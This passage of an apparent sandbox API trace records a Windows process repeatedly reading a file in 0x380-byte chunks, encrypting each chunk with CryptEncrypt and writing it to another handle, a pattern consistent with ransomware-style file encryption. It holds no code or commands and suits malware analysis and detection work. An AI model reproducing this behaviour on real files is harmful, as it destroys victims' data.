lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.416] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.416] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.416] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.416] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.417] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.417] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.417] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.417] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.417] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.418] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.418] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.418] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.418] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.418] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.418] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.419] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.419] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.419] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.419] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.419] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.419] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.419] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.419] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.419] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.419] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.420] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.420] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.421] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.421] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.422] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.422] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.423] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.423] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.424] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.424] ReadFile (in: 